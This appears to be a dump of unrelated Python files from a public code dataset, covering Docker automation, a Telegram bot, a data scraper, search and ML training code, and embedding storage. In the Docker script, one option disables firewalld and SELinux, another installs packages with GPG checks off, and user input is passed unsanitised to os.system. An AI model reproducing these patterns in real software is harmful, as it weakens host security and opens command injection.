{1}\".format(osname,osimage)\n\n\n\t\t\toutput = sp.getstatusoutput(cmd)\n\n\t\t\tstatus = output[0]\n\t\t\tout = output[1]\n\n\n\t\t\tif status == 0:\n\t\t\t    print(\"Your required {1} launched named {0}\".format(osname,osimage))\n\t\t\telse:\n\t\t\t    print(\"Error occurred : {}\".format(out))\n\t\telif int(choice)==2:\n\t\t\tos.system(\"systemctl stop firewalld\")\n\t\t\tos.system(\"setenforce 0\")\n\t\t\tos.system(\"systemctl start docker\")\n\t\telif int(choice)==3:\n\t\t\tos.system(\"systemctl status docker\")\n\t\t\n\t\telif int(choice)==4:\n\t\t\tidname=input(\"Enter os name or container id: \")\n
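\t\t\t# attach the local terminal to the running container\n\t\t\tos.system(\"docker 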
attach {}\".format(idname))\n\t\telif int(choice)==5:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker exec {} yum install httpd -y\".format(idname))\n\t\t\tos.system(\"docker exec {} /usr/sbin/httpd\".format(idname))\n\t\telif int(choice)==6:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker exec {} yum install python3 -y\".format(idname))\n\t\telif int(choice)==7:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker inspect {} | grep \\\"IPAddress\\\"\".format(idname))\n\t\telif int(choice)==8:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker start {}\".format(idname))\n\t\telif int(choice)==9:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker kill {}\".format(idname))\n\t\telif int(choice)==10:\n\t\t\tos.system(\"docker ps -a\")\n\t\telif int(choice)==11:\n\t\t\tos.system(\"docker ps\")\n\t\telif int(choice)==12:\n\t\t\tidname=input(\"Enter os name or container id: \")\n\t\t\tsourcpath=input(\"Enter the file name with path which you want to copy: \")\n\t\t\tdestpath=input(\"Enter the path in docker container: \")\n\t\t\tos.system(\"docker cp {} {}:{}\".format(sourcpath,idname,destpath))\n\t\telif int(choice)==13:\n\t\t\tos.system(\"docker images\")\n\t\telif int(choice)==14:\n\t\t\tdown=input(\"Enter the os image name: \")\n\t\t\tos.system(\"docker pull {}\".format(down))\n\t\telif int(choice)==15:\n\t\t\tdock=os.system(\"\"\"echo '[docker]\\nname=docker package\\nbaseurl=https://download.docker.com/linux/centos/7/x86_64/stable/\\ngpgcheck=0' >> /etc/yum.repos.d/docker.repo\"\"\")\n\t\t\tos.system(\"yum repolist\")\n\t\t\tos.system(\"yum install docker-ce --nobest -y\")\n\t\t\tos.system(\"systemctl start docker\")\n\t\telif int(choice)==16:\n\t\t\trem=input(\"Enter os name or container id: \")\n\t\t\tos.system(\"docker rm {}\".format(rem))\n\t\telif int(choice)==17:\n\t\t\tos.system(\"docker rm `docker ps -aq`\")\n\t\telif int(choice)==20:\n\t\t\texit()\n\t\telse:\n\t\t\tprint(\"can't understand\")\n\t\tinput(\"click Enter to continue\")\n\t\t","repo_name":"rangamani54/Automation-with-Python","sub_path":"drorgrem.py","file_name":"drorgrem.py","file_ext":"py","file_size_in_byte":3504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7843040843","text":"from pyrogram import Client, filters\n@Client.on_message(filters.command ('add'))\nasync def cmd_add(Client,message):\n user_id = str(message.from_user.id)\n CEO = \"1900986195\"\n GROUP = open(\"plugins/group.txt\").read().splitlines()\n if user_id != CEO :\n resp = \"𝗥𝗲𝗾𝘂𝗶𝗿𝗲 𝗢𝘄𝗻𝗲𝗿 𝗣𝗿𝗶𝘃𝗶𝗹𝗮𝗴𝗲𝘀 ⚠️\"\n msg1 = await message.reply_text(resp,message.id)\n else:\n chat_add = message.text[len('/add '):]\n if len(chat_add) == 0:\n chat_id = str(message.chat.id)\n else:\n chat_id = message.text[len('/add '):]\n groupid = chat_id\n if groupid in GROUP:\n resp = f\"\"\"\n𝗧𝗵𝗶𝘀 𝗴𝗿𝗼𝘂𝗽 ({groupid}) 𝗶𝘀 𝗮𝗹𝗿𝗲𝗮𝗱𝘆 𝗮𝘂𝘁𝗵𝗼𝗿𝗶𝘇𝗲𝗱 ⚠️.\n \"\"\"\n await message.reply_text(resp,message.id)\n else:\n with open(\"plugins/group.txt\", \"a\") as f:\n f.write(f\"{groupid}\\n\")\n resp = f\"\"\"\n𝗧𝗵𝗶𝘀 𝗴𝗿𝗼𝘂𝗽 ({groupid}) 𝗶𝘀 𝗻𝗼𝘄 𝗮𝘂𝘁𝗵𝗼𝗿𝗶𝘇𝗲𝗱 ✅.\n \"\"\"\n await message.reply_text(resp,message.id)\n \n ","repo_name":"TeamArmx/botwwwww","sub_path":"plugins/admin/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} 
+{"seq_id":"41921685196","text":"import logging\nfrom itertools import chain\n\nfrom hdx.location.country import Country\nfrom hdx.scraper.base_scraper import BaseScraper\nfrom hdx.scraper.utilities.sources import Sources\nfrom hdx.utilities.dateparse import default_date, parse_date\nfrom hdx.utilities.downloader import Download\n\nlogger = logging.getLogger(__name__)\n\nhxltags = {\n \"event_date\": \"#date+occurred\",\n \"event_type\": \"#event+type\",\n \"sub_event_type\": \"#event+type+sub\",\n \"actor1\": \"#group+name+first\",\n \"actor2\": \"#group+name+second\",\n \"admin1\": \"#adm1+name\",\n \"admin2\": \"#adm2+name\",\n \"admin3\": \"#adm3+name\",\n \"adm2_pcode\": \"#adm2+code\",\n \"location\": \"#loc+name\",\n \"latitude\": \"#geo+lat\",\n \"longitude\": \"#geo+lon\",\n \"notes\": \"#description\",\n \"fatalities\": \"#affected+killed\",\n}\n\n\nclass ACLED(BaseScraper):\n def __init__(\n self,\n datasetinfo,\n today,\n countryiso3s,\n outputs,\n admintwo,\n ):\n # ACLED outputs to its own tab \"fatalities\" so there are no headers\n super().__init__(\n \"acled\",\n datasetinfo,\n dict(),\n source_configuration=Sources.create_source_configuration(\n adminlevel=admintwo\n ),\n )\n self.start_date = parse_date(datasetinfo[\"start_date\"])\n self.today = today\n self.countryiso3s = countryiso3s\n self.outputs = outputs\n self.admintwo = admintwo\n\n def run(self):\n years = range(self.start_date.year, self.today.year + 1)\n iterables = list()\n reader = self.get_reader()\n for year in years:\n for countryiso3 in self.countryiso3s:\n countrycode = Country.get_m49_from_iso3(countryiso3)\n url = self.datasetinfo[\"url\"] % (countrycode, year)\n path = reader.download_file(url)\n downloader = Download()\n headers, iterator = downloader.get_tabular_rows(path, dict_form=True)\n iterables.append(iterator)\n latest_date = default_date\n rows = [list(hxltags.keys()), list(hxltags.values())]\n for inrow in chain.from_iterable(iterables):\n date = parse_date(inrow[\"event_date\"])\n if date < self.start_date:\n continue\n if date > latest_date:\n latest_date = date\n iso3 = Country.get_iso3_from_m49(int(inrow[\"iso\"]))\n admlevel = self.admintwo.get_admin_level(iso3)\n admname = inrow[f\"admin{admlevel}\"]\n pcode = None\n if admname:\n pcode, _ = self.admintwo.get_pcode(iso3, admname)\n inrow[\"adm2_pcode\"] = pcode\n row = list()\n for header in hxltags:\n row.append(inrow[header])\n rows.append(row)\n tabname = \"fatalities\"\n for output in self.outputs.values():\n output.update_tab(tabname, rows)\n self.datasetinfo[\"source_date\"] = latest_date\n\n def add_sources(self):\n self.add_hxltag_source(\n \"#date+latest+acled+regional\", datasetinfo=self.datasetinfo\n )\n for countryiso3 in self.countryiso3s:\n self.add_hxltag_source(\n f\"#date+latest+acled+{countryiso3.lower()}\",\n datasetinfo=self.datasetinfo,\n )\n","repo_name":"OCHA-DAP/hdx-scraper-hornafrica-viz","sub_path":"scrapers/acled.py","file_name":"acled.py","file_ext":"py","file_size_in_byte":3340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9260245954","text":"\r\nfrom mostra_caminho import MostraCaminho\r\n\r\n\r\nclass DepthFirst:\r\n\r\n def __init__(self, grafo, start, goalNode):\r\n self.mostraCaminho = MostraCaminho()\r\n self.caminho = {}\r\n self.visitados = []\r\n self.listaAdj = []\r\n self.grafo = grafo\r\n self.start = start\r\n self.goalNode = goalNode\r\n\r\n def iniciarBusca(self):\r\n self.depth_first()\r\n self.clear()\r\n\r\n def 
depth_first(self):\r\n\r\n        if self.busca(self.start):\r\n            self.mostraCaminho.mostra_caminho(self.start, self.goalNode, self.caminho)\r\n        else:\r\n            print('Not found')\r\n\r\n    def busca(self, start):\r\n\r\n        self.visitados.append(start)\r\n        self.listaAdj.append(start)\r\n        cidadeAtual = self.listaAdj.pop(0)\r\n\r\n        if cidadeAtual.__eq__(self.goalNode):\r\n            return True\r\n\r\n        for filho in self.grafo[cidadeAtual]:\r\n            if not self.visitados.__contains__(filho):\r\n                self.caminho[filho] = cidadeAtual\r\n                if self.busca(filho):\r\n                    return True\r\n        return False\r\n\r\n    def clear(self):\r\n        self.caminho.clear()\r\n        self.visitados.clear()\r\n        self.listaAdj.clear()\r\n\r\n\r\n\"\"\"from create_grafo import Grafo\r\ncreate = Grafo()\r\nDepthFirst(create.criaGrafo(), \"Arad\", \"Bucharest\").iniciarBusca()\"\"\"","repo_name":"mariotinelli/UENP","sub_path":"Inteligencia_Artificial/trabalho_inteligencia_artificial/depth_first_search.py","file_name":"depth_first_search.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"42918432417","text":"#!/usr/bin/env python3\n\"\"\"\nThe main entry point to the training procedure. All necessary objects are\ninitialized here and the training procedure is started.\n\"\"\"\n\nimport argparse\nimport collections\n\nimport numpy as np\nimport torch\nimport torch.nn.modules.loss as torch_loss\n\nimport data_loader.data_loaders as module_data\nimport logger.logger as module_logger\nimport model.loss as module_loss\nimport model.metric as module_metric\nimport model.model as module_arch\nimport trainer.scheduler as module_scheduler\nimport trainer.trainer as module_trainer\nimport dev_mapper.device_mapper as module_mapper\nfrom lib.config_parser import ConfigParser\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\nnp.random.seed(SEED)\n# The following is also required for exact reproducibility. 
However they can\n# have an impact on performance and are hence disabled by default.\n# torch.backends.cudnn.deterministic = True\n# torch.backends.cudnn.benchmark = False\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n logger = module_logger.get_logger('main')\n\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str, help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str, help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str, help='indices of GPUs to enable (default: all)')\n\n # custom cli options to modify configuration from default values given in json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float, target='optimizer;args;lr'),\n CustomArgs(['--bs', '--batch_size'], type=int, target='data_loader;args;batch_size')\n ]\n config = ConfigParser.from_args(args, options)\n\n # setup device mapper\n device_mapper = config.init_obj('device_mapper', module_mapper)\n\n # setup data_loader instances\n data_loader = config.init_obj('train_data_loader', module_data)\n valid_data_loader = config.init_obj('val_data_loader', module_data)\n\n # build model architecture, then print to console\n model = config.init_obj('arch', module_arch)\n model = device_mapper.parallelize_model(model)\n logger.info(model)\n\n # get function handles of loss and metrics\n # criterion = getattr(module_loss, config['loss'])\n # metrics = [getattr(module_metric, met) for met in config['metrics']]\n\n # get loss and metric modules\n loss = config.init_obj('loss', [module_loss, torch_loss])\n metrics = config.init_list_of_objs('metrics', module_metric)\n\n # Move loss and metrics parameters to correct GPU\n loss = device_mapper.map_modules(loss)\n metrics = device_mapper.map_modules(metrics)\n\n # build optimizer, learning rate scheduler. 
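The training entry point above seeds `torch` and `numpy` and leaves the cuDNN determinism flags commented out for speed. A sketch of a helper that turns all of them on at once; `seed_everything` is a hypothetical name, not part of the template:

```python
import random

import numpy as np
import torch

def seed_everything(seed: int = 123) -> None:
    """Seed every common RNG source; the cuDNN flags trade speed for determinism."""
    random.seed(seed)
    np.random.seed(seed)
    torch.manual_seed(seed)
    torch.cuda.manual_seed_all(seed)            # no-op on CPU-only machines
    torch.backends.cudnn.deterministic = True   # repeatable conv algorithms
    torch.backends.cudnn.benchmark = False      # disable the auto-tuner
```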
delete every lines containing lr_scheduler for disabling scheduler\n trainable_params = filter(lambda p: p.requires_grad, model.parameters())\n optimizer = config.init_obj('optimizer', torch.optim, trainable_params)\n\n lr_scheduler = config.init_obj('lr_scheduler', [torch.optim.lr_scheduler, module_scheduler], optimizer)\n\n trainer = config.init_obj('trainer', module_trainer, config, device_mapper, model, loss, metrics, optimizer,\n data_loader, valid_data_loader, lr_scheduler)\n\n trainer.train()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lming24/kaggle-melanoma","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5464464837","text":"from __future__ import division, print_function, unicode_literals\n\nfrom ufl import Form, Coefficient, TrialFunction, TestFunction, replace\nfrom ufl.core.expr import Expr\nfrom ufl.algorithms.analysis import extract_arguments_and_coefficients\nfrom ufl.equation import Equation\n\nfrom dune.common.utility import isString\n\nfrom dune.source.cplusplus import Include, NameSpace, TypeAlias, IfStatement\nfrom dune.source.cplusplus import SourceWriter\nfrom dune.source.fem import fieldTensorType\nfrom dune.ufl import GridFunction, DirichletBC\nfrom dune.ufl.gatherderivatives import gatherDerivatives\nfrom dune.ufl.codegen import uflSignature\n\nfrom .ufl import _compileUFL\nfrom .model import Integrands\n\n\ndef init(integrands, source, *args, **kwargs):\n coefficients = kwargs.pop('coefficients', dict())\n coefficientNames = integrands._coefficientNames\n if len(args) == 1 and isinstance(args[0], dict):\n coefficients.update(args[0])\n args = []\n else:\n args = list(a for a in args if not isinstance(a,DirichletBC) and not a is None)\n dirichletBCs = list(a for a in args if isinstance(a,DirichletBC))\n if len(args) > len(coefficientNames) + len(dirichletBCs):\n raise ValueError('Too many coefficients passed.')\n\n args += [None] * (len(coefficientNames) - len(args))\n\n for name, value in kwargs.items():\n try:\n i = coefficientNames[name]\n except KeyError:\n raise ValueError('No such coefficent: ' + name + '.')\n\n if args[i] is not None:\n raise ValueError('Coefficient already given as positional argument: ' + name + '.')\n args[i] = value\n\n for key, value in coefficients.items():\n if isinstance(key, Coefficient):\n try:\n i = integrands._renumbering[key]\n except AttributeError:\n raise ValueError('Cannot map UFL coefficients, because model was not generated from UFL form.')\n except KeyError:\n raise ValueError('No such coefficient: ' + str(key) + '.')\n elif isString(key):\n try:\n i = coefficientNames[key]\n except KeyError:\n raise ValueError('No such coefficent: ' + key + '.')\n else:\n raise ValueError('Expecting keys of coefficient map to be strings or intances of ufl.Coefficient.')\n if args[i] is not None:\n raise ValueError('Coefficient already given as positional or keyword argument: ' + str(key) + '.')\n args[i] = value\n\n if hasattr(integrands, '_renumbering'):\n for c, i in integrands._renumbering.items():\n if isinstance(c, GridFunction):\n if args[i] is None:\n args[i] = c.gf\n\n if any(arg is None for arg in args):\n missing = [name for name, i in coefficientNames.items() if args[i] is None]\n raise ValueError('Missing coefficients: ' + ', '.join(missing) + '.')\n\n integrands.base.__init__(integrands, *args, **kwargs)\n\n for c in source.constantList:\n if hasattr(c,\"name\") 
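`config.init_obj` above repeatedly turns a named config section into an instantiated object. Its real signature lives in the project's `ConfigParser`, so the following is only a guess at the underlying mechanics, with a made-up config shape:

```python
# Hypothetical reconstruction: look up the class named in the section and
# instantiate it with the section's kwargs plus any extra positional args.
def init_obj(config: dict, name: str, module, *args):
    section = config[name]              # e.g. {"type": "Adam", "args": {"lr": 1e-3}}
    cls = getattr(module, section["type"])
    return cls(*args, **section.get("args", {}))
```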
and hasattr(c,\"value\"):\n assert hasattr(integrands,c.name)\n getattr(type(integrands), c.name).fset(integrands, c.value)\n\n\ndef setConstant(integrands, index, value):\n try:\n index = integrands._renumbering[index]\n except KeyError:\n pass\n integrands._setConstant(index, value)\n\n\nclass Source(object):\n version = \"v1_3\"\n def __init__(self, integrands, grid, modelIncludes, form, *args,\n tempVars=True, virtualize=True):\n gridType = grid.cppTypeName\n gridIncludes = grid.cppIncludes\n self.gridType = gridType\n self.gridIncludes = gridIncludes\n if modelIncludes is not None:\n self.modelIncludes = modelIncludes\n else:\n self.modelIncludes = [\"dune/fempy/py/integrands.hh\"]\n self.integrands = integrands\n self.tempVars = tempVars\n self.virtualize = virtualize\n self.args = args\n self.form = form\n\n def signature(self):\n return uflSignature(self.form,\n *self.integrands._coefficients,\n *self.integrands.coefficientCppTypes,\n *self.integrands._constantNames,\n *[a for a in self.args if isinstance(a,DirichletBC)],\n *self.integrands.baseSignature\n )+Source.version\n\n def name(self):\n from dune.common.hashit import hashIt\n if self.virtualize:\n return self.integrands.baseName + '_' + self.signature() + '_' + hashIt(self.gridType)\n else:\n return self.integrands.baseName + '_nv_' + self.signature() + '_' + hashIt(self.gridType)\n\n def valueTuples(self):\n if isinstance(self.form, Form):\n derivatives = gatherDerivatives(self.form)\n return ['std::tuple< ' + ', '.join(fieldTensorType(v.ufl_shape) for v in d) + ' >' for d in derivatives]\n else:\n return [self.form.rangeValueTuple, self.form.domainValueTuple]\n\n # actual code generation (the generator converts this object to a string)\n def __str__(self):\n if isinstance(self.form, Form):\n # actual code generation\n integrands = _compileUFL(self.integrands, self.form, *self.args, tempVars=self.tempVars)\n else:\n integrands = self.integrands\n\n code = [Include('config.h')]\n code += [Include(i) for i in self.gridIncludes]\n\n code += integrands.includes()\n code.append(Include(\"dune/python/pybind11/pybind11.h\"))\n code.append(Include(\"dune/python/pybind11/extensions.h\"))\n code.append(Include(\"dune/fempy/py/grid/gridpart.hh\"))\n\n if integrands._coefficients:\n if self.virtualize:\n code.append(Include(\"dune/fempy/function/virtualizedgridfunction.hh\"))\n code.append(Include('dune/fempy/function/simplegridfunction.hh'))\n code.append(Include('dune/fem/misc/gridfunctionview.hh'))\n else:\n for c in integrands._coefficients:\n for i in c.cppIncludes:\n code.append(Include(i))\n for i in self.modelIncludes:\n code.append(Include(i))\n\n nameSpace = NameSpace('Integrands_' + self.signature())\n # add integrands class\n nameSpace.append(integrands.code(self.name(),integrands.targs))\n code.append(nameSpace)\n\n writer = SourceWriter()\n writer.emit(\"#ifndef GuardIntegrands_\" + self.signature())\n writer.emit(\"#define GuardIntegrands_\" + self.signature())\n writer.emit(\"#define USING_DUNE_PYTHON 1\")\n writer.emit(code)\n\n name = self.name()\n coefficients = integrands.coefficientCppTypes\n integrandsName = nameSpace.name + '::Integrands< ' + ', '.join(['GridPart'] + coefficients) + ' >'\n\n register = []\n register.append('auto cls = Dune::Python::insertClass(module,\"Integrands\",Dune::Python::GenerateTypeName(\"'+integrandsName+'\"), Dune::Python::IncludeFiles({\"python/dune/generated/'+name+'.cc\"})).first;')\n register.append('Dune::FemPy::registerIntegrands< Integrands >( module, cls );')\n if 
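`Source.name()` above appends `hashIt(self.gridType)` to the signature so each grid type gets its own compiled module. A rough analogue with `hashlib`, assuming `hashIt` is essentially a stable digest of the type string:

```python
import hashlib

def module_name(base: str, signature: str, grid_type: str) -> str:
    # Stable, filesystem-safe suffix so regenerating the same form for the
    # same grid reuses the previously compiled module.
    digest = hashlib.sha256(grid_type.encode("utf-8")).hexdigest()[:16]
    return f"{base}_{signature}_{digest}"
```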
coefficients:\n coefficientNames = integrands.coefficientNames\n initArgs = ', '.join('const ' + t + ' &' + n for t, n in zip(coefficients, coefficientNames))\n keepAlive = ', '.join('pybind11::keep_alive< 1, ' + str(i+2) + ' >()' for i in range(len(coefficientNames)))\n register.append('cls.def( pybind11::init( [] ( ' + initArgs + ' ) { return new Integrands( ' + ', '.join(coefficientNames) + ' ); } ), ' + keepAlive + ' );')\n else:\n register.append('cls.def( pybind11::init( [] () { return new Integrands(); } ) );')\n for t, n, ns in zip(integrands.constantTypes, integrands.constantNames, integrands.constantShortNames):\n te = \"Integrands::\" + t\n register.append('cls.def_property( \"' + ns + '\", [] ( Integrands &self ) -> ' + te + ' { return self.' + n + '(); }, [] ( Integrands &self, const ' + te + ' &v ) { self.' + n + '() = v; } );')\n register.append('cls.def_property_readonly( \"virtualized\", [] ( Integrands& ) -> bool { return '+str(self.virtualize).lower()+';});')\n hasDirichletBC = 'true' if integrands.hasDirichletBoundary else 'false'\n register.append('cls.def_property_readonly( \"hasDirichletBoundary\", [] ( Integrands& ) -> bool { return '+hasDirichletBC+';});')\n\n writer.openPythonModule(name)\n writer.emit(TypeAlias('GridPart', 'typename Dune::FemPy::GridPart< ' + self.gridType + ' >'))\n writer.emit(TypeAlias('Integrands', integrandsName))\n writer.emit(IfStatement('Integrands::gridPartValid',register,constexpr=True))\n writer.closePythonModule(name)\n writer.emit(\"#endif // GuardIntegrands_\" + self.signature())\n\n source = writer.writer.getvalue()\n writer.close()\n return source\n\n\n# Load the actual module - the code generation from the ufl form is done\n# when the 'Source' class is converted to a string i.e. in Source.__str__\ndef load(grid, form, *args, renumbering=None, tempVars=True,\n virtualize=True, modelPatch=[None,None],\n includes=None):\n\n if not isinstance(modelPatch,list) and not isinstance(modelPatch,tuple):\n modelPatch = [modelPatch,None]\n\n if isinstance(form, Equation):\n form = form.lhs - form.rhs\n\n if isinstance(form, Integrands):\n integrands = form\n else:\n if len(form.arguments()) < 2:\n raise ValueError(\"Integrands model requires form with at least two arguments.\")\n\n phi_, u_ = form.arguments()\n\n if phi_.ufl_function_space().scalar:\n phi = TestFunction(phi_.ufl_function_space().toVectorSpace())\n form = replace(form,{phi_:phi[0]})\n else:\n phi = phi_\n if u_.ufl_function_space().scalar:\n u = TrialFunction(u_.ufl_function_space().toVectorSpace())\n form = replace(form,{u_:u[0]})\n else:\n u = u_\n\n if not isinstance(form, Form):\n raise ValueError(\"ufl.Form or ufl.Equation expected.\")\n\n _, coeff_ = extract_arguments_and_coefficients(form)\n coeff_ = set(coeff_)\n\n # added for dirichlet treatment same as conservationlaw model\n dirichletBCs = [arg for arg in args if isinstance(arg, DirichletBC)]\n # remove the dirichletBCs\n arg = [arg for arg in args if not isinstance(arg, DirichletBC)]\n for dBC in dirichletBCs:\n _, coeff__ = extract_arguments_and_coefficients(dBC.ufl_value)\n coeff_ |= set(coeff__)\n\n coeff_ = sorted(list(coeff_), key=lambda c: c.count())\n coeff = {c : c.toVectorCoefficient()[0] for c in coeff_ if len(c.ufl_shape) == 0 and not c.is_cellwise_constant()}\n\n form = replace(form,coeff)\n uflExpr = [form]\n for dBC in dirichletBCs:\n arg.append(dBC.replace(coeff))\n uflExpr += [dBC.ufl_value] # arg[-1].ufl_value]\n\n if modelPatch[1] is not None:\n uflExpr += modelPatch[1]\n\n derivatives = 
gatherDerivatives(form, [phi, u])\n\n derivatives_phi = derivatives[0]\n derivatives_u = derivatives[1]\n\n integrands = Integrands(u,\n (d.ufl_shape for d in derivatives_u), (d.ufl_shape for d in derivatives_phi),\n uflExpr,virtualize)\n\n if modelPatch[0] is not None:\n modelPatch[0](integrands)\n\n # set up the source class\n source = Source(integrands, grid, includes, form, *args,\n tempVars=tempVars,virtualize=virtualize)\n\n # ufl coefficient and constants only have numbers which depend on the\n # order in whch they were generated - we need to keep track of how\n # these numbers are translated into the tuple numbering in the\n # generated C++ code\n if isinstance(form, Form):\n coefficients = set(integrands.coefficientList+integrands.constantList)\n numCoefficients = len(coefficients)\n if renumbering is None:\n renumbering = dict()\n renumbering.update((c, i) for i, c in enumerate(sorted((c for c in coefficients if not c.is_cellwise_constant()), key=lambda c: c.count())))\n renumbering.update((c, i) for i, c in enumerate(c for c in coefficients if c.is_cellwise_constant()))\n coefficientNames = integrands._coefficientNames # ['coefficient' + str(i) if n is None else n for i, n in enumerate(getattr(c, 'name', None) for c in coefficients if not c.is_cellwise_constant())]\n else:\n coefficientNames = form.coefficientNames\n\n # call code generator\n from dune.generator import builder\n module = builder.load(source.name(), source, \"Integrands\")\n\n assert hasattr(module,\"Integrands\"),\\\n \"GridViews of coefficients need to be compatible with the grid view of the ufl model\"\n\n rangeValueTuple, domainValueTuple = source.valueTuples()\n setattr(module.Integrands, \"_domainValueType\", domainValueTuple)\n setattr(module.Integrands, \"_rangeValueType\", rangeValueTuple)\n # redirect the __init__ method to take care of setting coefficient and renumbering\n class Model(module.Integrands):\n def __init__(self, *args, **kwargs):\n self.base = module.Integrands\n init(self,integrands,*args,**kwargs)\n for c in integrands.constantList:\n c.registerModel(self)\n\n setattr(Model, '_coefficientNames', {n: i for i, n in enumerate(coefficientNames)})\n if renumbering is not None:\n setattr(Model, '_renumbering', renumbering)\n Model._setConstant = module.Integrands.__dict__['setConstant']\n setattr(Model, 'setConstant', setConstant)\n\n return Model\n","repo_name":"dune-mirrors/dune-fem","sub_path":"python/dune/models/integrands/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":13812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"70589346115","text":"import pymilvus\nfrom app import database\n\n\ndef create_language_model(model_name: str, num_dims: int):\n \"\"\"Create a new language model in milvus by adding a record to the meta\n collection, and createing a new collection for the language model\"\"\"\n meta_collection = database.create_or_get_model_metadata()\n meta_collection.insert(\n [\n model_name,\n num_dims,\n ]\n )\n model_collection = __create_language_model_colection__(model_name, num_dims)\n return model_collection\n\n\ndef get_language_model(model_name: str):\n return pymilvus.Collection(f\"model.{model_name}\", using=database.MILVUS_ALIAS)\n\n\ndef delete_language_model(model_name: str):\n \"\"\"Delete a language model from milvus by removing the record from the meta\n collection, and deleting the collection for the language model\"\"\"\n meta_collection = database.create_or_get_model_metadata()\n 
meta_collection.delete_records([model_name])\n model_collection = pymilvus.Collection(\n name=f\"model.{model_name}\", using=database.MILVUS_ALIAS\n )\n model_collection.drop()\n return model_collection\n\n\ndef __create_language_model_colection__(model_name: str, num_dims: int):\n \"\"\"Create a new collection for a language model\"\"\"\n model_name = f\"model.{model_name}\"\n if pymilvus.utility.has_collection(model_name, using=database.MILVUS_ALIAS):\n raise ValueError(f\"Collection {model_name} already exists\")\n word_field = pymilvus.FieldSchema(\n name=\"word\",\n dtype=pymilvus.DataType.VARCHAR,\n max_length=128,\n )\n embedding_field = pymilvus.FieldSchema(\n name=\"embedding\",\n dtype=pymilvus.DataType.FLOAT_VECTOR,\n dim=num_dims,\n )\n schema = pymilvus.CollectionSchema(\n fields=[word_field, embedding_field],\n description=f\"Language model {model_name} d={num_dims}\",\n )\n collection = pymilvus.Collection(\n name=model_name,\n schema=schema,\n using=database.MILVUS_ALIAS,\n )\n return collection\n\n\ndef insert_embedding(model_name: str, word: str, embedding: list[float]):\n \"\"\"Insert a word embedding into a language model\"\"\"\n model_collection = get_language_model(model_name)\n model_collection.insert(\n [\n word,\n embedding,\n ]\n )\n return model_collection\n\n\ndef remove_embeddings(model_name: str, words: str):\n \"\"\"Remove a word embedding from a language model\"\"\"\n model_collection = get_language_model(model_name)\n words = \",\".join(words)\n expr = f\"word in ({words})\"\n model_collection.delete(expr)\n return model_collection\n","repo_name":"BenDavidAaron/readr","sub_path":"api/app/language_models.py","file_name":"language_models.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26324812279","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 27 10:39 2020\n\n@author: fdbfvuie\n\"\"\"\n\nimport math\n\nn = int(input())\nfor i in range(n):\n a = int(input())\n b = int(input())\n sum = 0\n\n for j in range(math.ceil(math.sqrt(a)), math.floor(math.sqrt(b)) + 1, 1):\n sum += j ** 2\n\n print(\"Case \" + str(i+1) + \": \" + str(sum))","repo_name":"fjfhfjfjgishbrk/AE401-Python","sub_path":"zerojudge/a059.py","file_name":"a059.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13842550540","text":"from Dent import *\n#\nb_stitch = Button(control, text=\"stitch and normalize\", activeforeground=\"blue\")\nb_norms = Label(control, text=\"normalize takes about 10s\", foreground=\"blue\")\nb_norms.grid(row=1, column=2)\nb_stitch['command'] = lambda text=b_norms: stitch(b_norm = text)\nb_stitch.grid(row=1, column=1)\n\n# update button\nt_norm = Label(control, text=\"crop take less than 1s\", foreground=\"blue\")\nt_norm.grid(row=2, column=2)\nb_norm = Button(control, text=\"crop\", activeforeground=\"blue\")\nb_norm['command'] = lambda text=t_norm: raw.crop(t_norm = text)\nb_norm.grid(row=2, column=1)\n\n# update button\n# slider\nvar = DoubleVar()\nslider = Scale(control, variable=var, orient=HORIZONTAL, to=10, from_=200)\nslider.set(110)\nslider.grid(row=3, column=0)\n# button\nt_extract = Label(control, text=\"Extracting takes 2s\", foreground=\"blue\")\nt_extract.grid(row=3, column=2)\nb_extract = Button(control, text=\"extract\", activeforeground=\"blue\")\nb_extract['command'] = lambda text=t_extract, slider=slider: 
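`remove_embeddings` above joins the raw words straight into the delete expression; for a `VARCHAR` field like `word`, Milvus boolean expressions expect quoted string literals, so unquoted values would likely fail to match. A sketch of a safer builder, assuming the words contain no embedded quotes:

```python
def words_in_expr(words: list[str]) -> str:
    quoted = ", ".join(f'"{w}"' for w in words)
    return f"word in [{quoted}]"

print(words_in_expr(["cat", "dog"]))  # word in ["cat", "dog"]
```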
